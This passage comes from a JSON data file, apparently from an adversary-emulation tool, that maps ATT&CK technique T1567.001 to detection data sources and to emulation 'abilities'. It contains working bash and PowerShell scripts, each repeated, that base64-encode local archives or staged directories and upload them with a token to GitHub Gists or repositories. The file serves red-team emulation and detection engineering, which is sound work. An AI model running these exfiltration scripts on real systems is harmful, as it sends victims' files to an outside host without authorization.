"A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1567.001", + "command_list": [ + "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n", + "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f $EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n", + "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n", + "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n", + "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" >>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n", + "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n" + ], + "commands": [ + { + "command": "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n", + "source": "data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml", + "name": "This ability exfiltrates a compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n" + }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f $EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n", + "source": "data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml", + "name": "This ability exfiltrates a compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n" + }, + { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n", + "source": "data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml", + "name": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid." + }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n", + "source": "data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml", + "name": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid." + }, + { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" >>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n", + "source": "data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml", + "name": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n" + }, + { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n", + "source": "data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml", + "name": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n" + } + ], + "parsed_datasets": [ + { + "id": "0582dc26-e0cf-4645-88cf-f37a02279976", + "name": "Exfil Compressed Archive to Github Gist", + "description": "This ability exfiltrates a compressed archive to Github Gists (Base64 Encoded). To reconstitute, save\nthe base64 string from the Gist and run ----\n(Powershell) [Convert]::FromBase64String($(Get-Content b64.txt)) | set-content archive.extension -encoding byte ----\n(Linux) cat b64.txt | base64 -d > archive.extension\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHPAT=\"#{github.access.token}\";\nFileContent=$(base64 #{host.dir.compress});\nLocalFile='#{host.dir.compress}';\nRemoteFile=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ntmp_file=$(mktemp);\necho \"{\\\"public\\\": false,\\\"files\\\": {\\\"$RemoteFile\\\": {\\\"content\\\": \\\"${FileContent}\\\"}}}\" > $tmp_file;\ncurl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;\nrm $tmp_file\n" + } + }, + "windows": { + "psh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHPAT = \"#{github.access.token}\";\n$File = Get-Item -Path \"#{host.dir.compress}\";\n$Token = $GHUser + \":\" + $GHPAT;\n$EncodedToken = [System.Convert]::ToBase64String([char[]]$Token);\n\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-paw-$($File.name)\";\n$FileContent = [Convert]::ToBase64String([IO.File]::ReadAllBytes($File));\n\n$StringContent = @{\n files = @{$RemoteName = @{content = $FileContent}};\n public = $False;\n} | ConvertTo-Json;\n$URL = \"https://api.github.com/gists\";\n$Body = $StringContent;\n$Headers = @{\n \"content-type\" = \"application/json\";\n \"Authorization\" = 'Basic {0}' -f $EncodedToken;\n};\nInvoke-WebRequest -Uri $URL -Method POST -Body $Body -Headers $Headers 1>$null -UseBasicParsing;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "4a1120a5-971c-457f-bb07-60641b4723fd", + "name": "Exfil Compressed Archive to Github Repository", + "description": "This will exfiltrate a given compressed directory to a GitHub repository. It assumes that all the facts supplied are valid.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalFile='#{host.dir.compress}';\nHeader=\"Authorization: token $GHPAT\";\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\necho \"{\\\"message\\\":\\\"Committed $RemoteName\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\nbase64 -w 0 $LocalFile >>/tmp/b64;\necho \"\\\"}\" >>/tmp/b64;\ncontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\nrm /tmp/b64;\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n$file = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n$uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n\n$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n$Body = @{\n path = $RemoteName;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $RemoteName;\n} | ConvertTo-Json;\ntry {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n} catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + }, + { + "id": "a201bec2-a193-4b58-bf0e-57fa621da474", + "name": "Exfil Directory Files to GitHub", + "description": "This ability will exfiltrate all files in a set staged directory to a repository in GitHub.\n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1567.001", + "name": "Exfiltration to Code Repository" + }, + "platforms": { + "linux": { + "sh": { + "command": "GHUser=\"#{github.user.name}\";\nGHRepo=\"#{github.repository.name}\";\nGHPAT=\"#{github.access.token}\";\nGHBranch='#{github.repository.branch}';\nLocalDirectory=#{host.dir.staged};\nHeader=\"Authorization: token $GHPAT\";\n\nfor file in $LocalDirectory/*.*; do\n TempName=$(echo $file | sed \"s/ /-/g\")\n\tRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename \"$TempName\")\";\n\techo \"{\\\"message\\\":\\\"Committed $(basename $TempName) at: $(date)\\\", \\\"branch\\\":\\\"$GHBranch\\\", \\\"content\\\":\\\"\" >/tmp/b64;\n base64 -w 0 \"$file\" >>/tmp/b64;\n echo \"\\\"}\" >>/tmp/b64;\n\tcontent=$(curl -s -X PUT -H \"Accept: application/vnd.github.v3+json\" -H \"$Header\" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);\n rm /tmp/b64;\ndone;\n" + } + }, + "windows": { + "psh,pwsh": { + "command": "$GHUser = \"#{github.user.name}\";\n$GHRepo = \"#{github.repository.name}\";\n$GHPAT = \"#{github.access.token}\";\n$GHBranch = '#{github.repository.branch}';\n$LocalDirectory = \"#{host.dir.staged}\";\n$token = $GHUser + \":\" + $GHPAT;\n$basetoken = [System.Convert]::ToBase64String([char[]]$token);\n$Headers = @{\n Authorization = 'Basic {0}' -f $basetoken;\n};\n\n$Files = Get-ChildItem $LocalDirectory;\nforeach ($file in $Files){\n $RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)\";\n $uri = \"https://api.github.com/repos/\" + $GHUser + \"/\" + $GHRepo + \"/contents/\" + $RemoteName;\n $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;\n $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);\n $Body = @{\n path = $file.Name;\n branch = $GHBranch;\n content = $Base64EncodedFileBytes;\n encoding = 'base64';\n message = \"Committed \" + $file.name + \" at: \" + (Get-Date);\n } | ConvertTo-Json;\n try {\n $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;\n } catch {\n if ($PSItem -notmatch \"but expected\") { $PSItem; }\n else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }\n }\n};\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", 